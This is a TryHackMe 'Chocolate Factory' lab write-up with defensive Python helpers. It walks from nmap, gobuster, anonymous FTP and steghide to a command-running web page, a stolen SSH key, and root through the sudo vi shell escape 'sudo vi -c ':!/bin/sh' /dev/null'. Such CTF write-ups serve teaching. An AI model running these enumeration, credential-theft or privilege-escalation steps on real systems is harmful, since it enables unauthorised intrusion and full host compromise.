TryHackMe Chocolate Factory WriteUp

Hello and Welcome to my first writeup!

Reconnaissance and Enumeration

First we scan the machine with nmap, using the command:

nmap -sV [IP HERE]

nmap scan result:

21/tcp  open  ftp        vsftpd 3.0.3
22/tcp  open  ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http       Apache httpd 2.4.29 ((Ubuntu))
100/tcp open  newacct?
106/tcp open  pop3pw?
109/tcp open  pop2?
110/tcp open  pop3?
111/tcp open  rpcbind?
113/tcp open  ident?
119/tcp open  nntp?
125/tcp open  locus-map?

Only FTP, SSH and HTTP returned a recognisable version banner. The trailing "?" on the other ports means nmap could not match a service fingerprint and is only showing the name from its port-number table, so those entries are guesses, not identified services.
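As an added illustration (not part of the original writeup), here is a small Python parser that turns the scan table above into structured records and separates the three fingerprinted services from the eight the scanner could only guess. The sample input is the output quoted above, embedded as a constant; the `?` handling follows nmap's own convention for unmatched service probes.

```python
import re

# Constructed sample input: the nmap -sV port table quoted in this writeup.
NMAP_OUTPUT = """\
21/tcp  open  ftp        vsftpd 3.0.3
22/tcp  open  ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http       Apache httpd 2.4.29 ((Ubuntu))
100/tcp open  newacct?
106/tcp open  pop3pw?
109/tcp open  pop2?
110/tcp open  pop3?
111/tcp open  rpcbind?
113/tcp open  ident?
119/tcp open  nntp?
125/tcp open  locus-map?
"""

# port/proto, state, service name, and an optional version column.
LINE_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap(text):
    """Parse the port table of an `nmap -sV` run into a list of dicts.

    nmap appends '?' to the service name when no version probe matched; in
    that case the name is just the entry from its port-number table, so the
    record is marked guessed=True and carries no version string.
    """
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # headers, blank lines, anything that is not a port row
        port, proto, state, service, version = m.groups()
        rows.append({
            "port": int(port),
            "proto": proto,
            "state": state,
            "service": service.rstrip("?"),
            "guessed": service.endswith("?"),
            "version": (version or "").strip(),
        })
    return rows


def fingerprinted(rows):
    """Services whose banner or probe response nmap actually recognised."""
    return [r for r in rows if not r["guessed"]]


def unidentified(rows):
    """Open ports where the service name is only a port-table guess."""
    return [r for r in rows if r["guessed"]]


if __name__ == "__main__":
    rows = parse_nmap(NMAP_OUTPUT)
    for r in fingerprinted(rows):
        print(f"{r['port']}/{r['proto']} {r['service']:8} {r['version']}")
    print("unidentified:", [r["port"] for r in unidentified(rows)])
```

Keeping the guessed rows separate matters when you write up findings: a version string is evidence, a port-table name is not.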

ftp enumeration

We log in to FTP with username "anonymous" and password "anonymous".

In FTP we find "gum_room.jpg".

We use steghide to extract the hidden data from it:

steghide extract -sf gum_room.jpg

I left the passphrase empty, and b64.txt was extracted.

It contains what looks like an /etc/shadow file. I didn't find anything useful in it.

web enumeration

We open the webpage and find a login portal.

I used gobuster to enumerate directories:

gobuster dir -u http://[IP HERE] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html

gobuster: the name of the tool.

dir: directory and file brute-forcing mode.

-u: the target URL.

-w: the wordlist to use.

-x: also try each word with these file extensions.

Result:

/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 1466]
/home.php             (Status: 200) [Size: 569]
/validate.php         (Status: 200) [Size: 93]

Initial Access:

We navigate to home.php; it lets you run commands.

We try the whoami command.

It works! We search for users in the home directory using "ls /home".

We find the user charlie and list their files using "ls /home/charlie".

cat /home/charlie/teleport

Bingo! We found an SSH private key.

I copied it into an id_rsa file, gave it the right permissions with chmod 600 id_rsa, and tested whether we can log in over SSH as that user. The key works!

In /var/www/html I found a file named key_rev_key. I tried to run it, then changed the permissions using chmod +x key_rev_key so that it could execute.

Since it's a binary, we can check its contents using strings key_rev_key.

Got the key!

b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='
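
The reason `strings` gives up the key is that a secret stored as plain text in a binary survives compilation untouched. As an added example (not the room's binary or the author's code), the Python below re-implements what `strings` does and then flags any extracted string with the same shape as the key above, 43 URL-safe base64 characters plus one `=` pad (32 raw bytes), using an entropy floor so that filler text of the right length is not reported. The byte blob and the token embedded in it are constructed placeholders, not the real key.

```python
import math
import re

# Constructed stand-in for a compiled binary: a fake ELF header, some
# non-printable "code" bytes, a couple of ordinary message strings and one
# embedded token with the same shape as the key recovered in this writeup
# (43 URL-safe base64 characters plus one '=' pad, i.e. 32 raw bytes).
# The token is a placeholder, not the room's real key.
PLACEHOLDER_KEY = "pLaCeHoLdEr-KeY_0123456789abcdefABCDEFghijk="
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01" + bytes(range(32))
    + b"Enter your name: \x00"
    + b"Congratulations! Here is the key: \x00"
    + PLACEHOLDER_KEY.encode() + b"\x00"
    + bytes([0x90] * 32)
    + b"/lib64/ld-linux-x86-64.so.2\x00"
)

KEY_SHAPE = re.compile(r"[A-Za-z0-9_-]{43}=")


def extract_strings(blob, min_len=4):
    """What `strings` does: every run of at least min_len printable ASCII
    bytes (0x20-0x7e), in file order. Secrets stored as plain text in a
    binary come straight out of this."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def shannon_entropy(s):
    """Bits of entropy per character; random key material scores high."""
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def find_embedded_keys(blob, min_entropy=3.5):
    """Flag extracted strings that look like 32-byte base64 keys.
    The entropy floor keeps filler of the right length (e.g. a row of
    identical characters) from being reported."""
    hits = []
    for s in extract_strings(blob):
        for m in KEY_SHAPE.finditer(s):
            token = m.group()
            if shannon_entropy(token) >= min_entropy:
                hits.append(token)
    return hits


if __name__ == "__main__":
    for s in extract_strings(SAMPLE_BINARY):
        print("string:", s)
    print("key-shaped, high-entropy:", find_embedded_keys(SAMPLE_BINARY))
```

The same check, pointed at your own build artefacts before they ship, is a cheap way to catch keys that were meant to live in a config file or secret store rather than in the executable.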

In /var/www/html we cat validate.php.

Running validate.php, bingo, we got charlie's password :)

Log in to charlie's account using "su charlie".

user.txt gives us the user flag.

Privilege Escalation:

The first thing you should check is sudo -l. Result:

Matching Defaults entries for charlie on chocolate-factory:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User charlie may run the following commands on chocolate-factory:
    (ALL : !root) NOPASSWD: /usr/bin/vi

GTFOBins lists a shell escape for vi: vi -c ':!/bin/sh' /dev/null

I ran it with sudo, so that if it works we get root privileges:

charlie@chocolate-factory:/home/charlie$ sudo vi -c ':!/bin/sh' /dev/null

pwned!!
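From the defender's side, the rule in the sudo -l output above is the thing to catch before anyone reaches the GTFOBins step: an editor that can spawn a shell, granted without a password, and restricted only by a negated runas entry. The following Python audit is an added example, not the author's code or any sudo tooling; it parses the exact `sudo -l` text quoted above (embedded as a constant), flags each of those three properties, and shows a constructed contrast rule that produces no findings. The list of shell-escape binaries is an illustrative subset, not GTFOBins' full list.

```python
import re

# Constructed sample: the `sudo -l` output quoted in this writeup.
SUDO_L_OUTPUT = """\
Matching Defaults entries for charlie on chocolate-factory:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User charlie may run the following commands on chocolate-factory:
    (ALL : !root) NOPASSWD: /usr/bin/vi
"""

# Constructed contrast: one account, one non-interactive command, password required.
HARDENED_OUTPUT = """\
User charlie may run the following commands on chocolate-factory:
    (root) /usr/bin/systemctl restart apache2
"""

# A rule line: (runas spec), optional TAG: markers, then the command list.
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+?)\s*$")

# Interactive programs that can start a shell from inside (GTFOBins keeps the
# full list); a sudo rule for any of these is in effect a sudo rule for /bin/sh.
SHELL_ESCAPE_BINARIES = {"vi", "vim", "less", "more", "man", "find", "awk", "perl", "python"}


def parse_rules(text):
    """Return the command rules from `sudo -l` output as dicts."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True        # everything after this header is a rule
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tags, cmds = m.groups()
        rules.append({
            "runas": runas.strip(),
            "tags": [t.rstrip(":") for t in tags.split()],
            "commands": [c.strip() for c in cmds.split(",")],
        })
    return rules


def audit(rules):
    """Findings a defender would raise against each rule."""
    findings = []
    for r in rules:
        for cmd in r["commands"]:
            name = cmd.split()[0].rsplit("/", 1)[-1]
            if name in SHELL_ESCAPE_BINARIES:
                findings.append(f"{cmd}: can spawn a shell from inside, so this "
                                f"rule hands out an interactive shell as ({r['runas']})")
        if "NOPASSWD" in r["tags"]:
            findings.append(f"({r['runas']}) {', '.join(r['commands'])}: NOPASSWD means "
                            "a hijacked session or injected command runs it unchallenged")
        if "!" in r["runas"]:
            findings.append(f"({r['runas']}): a negated runas entry is a deny-list; "
                            "name the single account the command should run as instead")
    return findings


if __name__ == "__main__":
    for f in audit(parse_rules(SUDO_L_OUTPUT)):
        print("FINDING:", f)
    print("hardened rule findings:", audit(parse_rules(HARDENED_OUTPUT)))
```

Run the parser over the output of `sudo -l -U <user>` on your own hosts; three findings on a single rule, as here, is the pattern that turns a web-shell foothold into a full compromise.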

Finding the root flag

We find root.py and run it; entering the key we obtained before, it shows us the root flag.

Happy Pwning :)

This post is licensed under CC BY 4.0 by the author.